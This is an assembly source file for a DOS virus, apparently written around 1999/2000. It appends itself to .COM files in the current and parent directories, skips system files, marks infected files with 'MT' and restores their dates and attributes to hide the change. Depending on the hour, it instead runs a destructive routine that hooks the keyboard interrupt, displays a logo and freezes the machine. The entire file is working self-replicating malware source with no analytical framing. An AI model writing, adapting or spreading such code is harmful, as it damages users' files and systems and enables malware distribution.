doscom.asm

; ***************************************************************************
; * written by cod in 1999/2000 ?
; ***************************************************************************

.MODEL TINY

.CODE

         ORG 100h

start:             CALL get_disp

get_disp:          MOV AX, SS
                   MOV ES, AX
                   MOV BX, SP
                   MOV AX, WORD PTR  [ ES : BX ]
                   MOV BP, AX

                   MOV AX, CS
                   MOV ES, AX
                   XOR BX, BX

                   SUB SP, 2
                   SUB BP, OFFSET get_disp

check_if_destruct: MOV AH, 02Ch
                   INT 21h

                   CMP CH, 20
                   JE destruct
                   CMP CH, 20
                   JNB destruct
                   
                   LEA DI, [ BP + save_path ]
                   JMP DI

destruct:          LEA DI, [ BP + happy_month ]
                   JMP DI

save_path:         MOV AH, 47h
                   XOR DL, DL
                   LEA SI, [ BP + org_path ]
                   INT 21h

get_dta:           MOV AH, 2Fh
                   INT 21h
                   MOV [ BP + old_dta_off ], BX

set_dta:           MOV AH, 1Ah
                   LEA DX, [ BP + dta_filler ]
                   INT 21h

search:            ; Ricerca di un file

find_first:        MOV AH, 4Eh
                   MOV CX, [ BP + search_attrib ]
                   LEA DX, [ BP + search_mask ]
                   INT 21h

                   JNC clear_attrib

find_next:         MOV AH, 4Fh
                   INT 21h
                   JNC clear_attrib

still_searching:   MOV AH, 3Bh
                   LEA DX, [ BP + previous_dir ]
                   INT 21h

                   JNC search
                   LEA DI, [ BP + bomb ]
                   JMP DI

clear_attrib:      MOV AX, 4301h
                   XOR CX, CX
                   LEA DX, [ BP + dta_file_name ]
                   INT 21h

                   XCHG BX, AX

check_if_not_infected:
                   CLD
                   LEA DI, [ BP + command_com ]
                   LEA SI, [ BP + dta_file_name ]
                   MOV CX, 11
                   REPE CMPSB

                   JE go_next

                   LEA DI, [ BP + ibmbio_com ]
                   LEA SI, [ BP + dta_file_name ]
                   MOV CX, 10
                   REPE CMPSB

                   JE go_next

                   LEA DI, [ BP + ibmdos_com ]
                   LEA SI, [ BP + dta_file_name ]
                   MOV CX, 10
                   REPE CMPSB

                   JNE check_if_infected

go_next:           LEA DI, [ BP + close_file ]
                   JMP DI

check_if_infected: PUSH AX
                   PUSH BX
                   MOV AX, 3D02h

                   LEA DX, [ BP + dta_file_name ]
                   INT 21h

                   JNC opened

                   POP BX
                   POP AX
                   MOV DI, BP
                   LEA DI, [ BP + close_file ]
                   JMP DI

opened:            MOV WORD PTR [ BP + handle_of_file ], AX
                   POP BX
                   POP AX

                   XOR CX, CX
                   XOR DX, DX

                   MOV AX, 4200h
                   MOV BX, WORD PTR [ BP + handle_of_file ]
                   INT 21h

                   MOV AH, 3Fh
                   MOV BX, WORD PTR [ BP + handle_of_file ]
                   MOV CX, 0002h
                   LEA DX, [ BP + last_chars ]
                   INT 21h


                   MOV AX, WORD PTR [ BP + last_chars ]
                   CMP AX, WORD PTR [ BP + exe_id ]
                   JE go_to_next
                   JMP com_valid

go_to_next:        LEA DI, [ BP + restore_date_time ]
                   JMP DI

com_valid:         MOV DX, WORD PTR [ BP + dta_file_size ]
                   SUB DX, 2

                   MOV AX, 4200h
                   MOV BX, WORD PTR [ BP + handle_of_file ]
                   MOV CX, 0000h
                   INT 21h

                   MOV AH, 3Fh
                   MOV BX, WORD PTR [ BP + handle_of_file ]
                   MOV CX, 0002h
                   LEA DX, [ BP + last_chars ]
                   INT 21h

                   MOV AH, [ BP + last_chars ]
                   CMP AH, [ BP + virus_id ]
                   JNE save_3_bytes

                   MOV AH, [ BP + last_chars + 1 ]
                   CMP AH, [ BP + virus_id + 1 ]
                   JNE save_3_bytes
                   LEA DI, [ BP + close_file ]
                   JMP DI

save_3_bytes:      MOV AX, 4200h

                   XOR CX, CX
                   XOR DX, DX
                   INT 21h

                   MOV AH, 3Fh
                   MOV BX, WORD PTR [ BP + handle_of_file ]
                   MOV CX, 0003h
                   LEA DX, [ BP + _3_bytes ]
                   INT 21h

goto_eof:          MOV AX, 4202h
                   MOV BX, WORD PTR [ BP + handle_of_file ]
                   XOR CX, CX
                   XOR DX, DX
                   INT 21h

save_jmp_displacement:
                   SUB AX, 0003h
                   MOV [ BP + jmp_disp ], AX

write_code:        MOV AH, 40h
                   MOV BX, WORD PTR [ BP + handle_of_file ]
                   MOV CX, virus_length
                   LEA DX, [ BP + start ]
                   INT 21h


goto_baf:          MOV AX, 4200h
                   MOV BX, WORD PTR [ BP + handle_of_file ]
                   XOR CX, CX
                   XOR DX, DX
                   INT 21h

write_jmp:         MOV AH, 40h
                   MOV BX, WORD PTR [ BP + handle_of_file ]
                   MOV CX, 0003h
                   LEA DX, [ BP + jmp_code ]
                   INT 21h

                   INC [ BP + infections ]

restore_date_time: MOV AX, 5701h
                   MOV CX, [ BP + dta_file_time ]
                   MOV DX, [ BP + dta_file_date ]
                   INT 21h

close_file:        MOV AH, 3Eh
                   MOV BX, [ BP + handle_of_file ] 
                   INT 21h

restore_attrib:    XOR CH, CH
                   MOV CL, [ BP + dta_file_attrib ]
                   MOV AX, 4301h

                   LEA DX, [ BP + dta_file_name ]
                   INT 21h

done_infecting?:   MOV AH, [ BP + infections ]
                   CMP AH, [ BP + max_infections ]
                   JZ bomb
                   LEA DI, [ BP + find_next ]
                   JMP DI

return_control:    MOV DI, 100h
                   JMP DI
bomb:

restore_path:      MOV AH, 3Bh
                   LEA DX, [ BP + root ]
                   INT 21h

                   MOV AH, 3Bh
                   LEA DX, [ BP + org_path ]
                   INT 21h

restore_dta:       MOV AH, 1Ah
                   MOV DX, [ BP + old_dta_off ]
                   INT 21h

restore_3_bytes:   LEA SI, [ BP + _3_bytes ]
                   MOV DI, 100h
                   CLD
                   MOV CX, 0003h
                   REP MOVSB

return_control_or_exit:
                   CMP BP, 0000h
                   JE exit
                   LEA DI, [ BP + return_control ]
                   JMP DI

exit:              MOV AX, 4C00h
                   INT 21h

happy_month:       CMP [CS:is_encrypt], 00h
                   JE execute_now

execute_wait:      MOV CX, bad_routine_length
                   MOV AX, CS
                   MOV ES, AX
                   LEA DI, [ BP + execute_now ]

repeat_loop:       MOV AL, BYTE PTR [ ES : DI ]
                   SUB AL, [CS:is_encrypt]
                   INC DI
                   LOOP repeat_loop

execute_now:       CLI
                   XOR AX, AX
                   MOV ES, AX
                   MOV BX, 09h * 4
                   LEA DI, [ BP + Lock_Int_09 ]
                   MOV DX, DI
                   ADD BX, 2
                   MOV [ ES : BX ], DX
                   SUB BX, 2
                   MOV DX, CS
                   MOV [ ES : BX ], DX
                   STI

                   MOV AX, CS
                   MOV DS, AX

                   MOV AX, 0003h
                   INT 10h

                   MOV AX, 0B800h
                   MOV ES, AX
                   XOR DI, DI
                   MOV AX, CS
                   MOV DS, AX
                   LEA SI, [ BP + logo ]
                   MOV CX, 20 * 8

                   REP MOVSW

current_location:  NOP
                   JMP current_location

reset_cpu          DB 0EAh, 0F0h, 0FFh, 00h, 0F0h

execute_stop:      NOP

Lock_Int_09:       IRET

old_dta_off        DW ?
dta_filler         DB 21 dup ( ? )
dta_file_attrib    DB ?
dta_file_time      DW ?
dta_file_date      DW ?
dta_file_size      DD ?
dta_file_name      DB 13 dup ( ? )

is_encrypt         DB ?

search_mask        DB '*.COM', 0
search_attrib      DW 00100111b
command_com        DB 'COMMAND.COM'
ibmbio_com         DB 'IBMBIO.COM'
ibmdos_com         DB 'IBMDOS.COM'
previous_dir       DB '..', 0
root               DB '\', 0
org_path           DB 64 DUP ( ? )
infections         DB ?
max_infections     DB 1
handle_of_file     DW ?

logo               Db 'ascii text encoded with text mode attributes.. 4 bit for color and 4 bit for background!$', 00h

_3_bytes           DB 0, 0, 0

exe_id             DB 'MZ'

jmp_code           DB 0E9h

jmp_disp           DW ?

last_chars         DB 0, 0

virus_id           DB 'MT'

EOV:
virus_length       EQU OFFSET EOV - OFFSET start
bad_routine_length EQU OFFSET execute_now - OFFSET execute_stop

END                start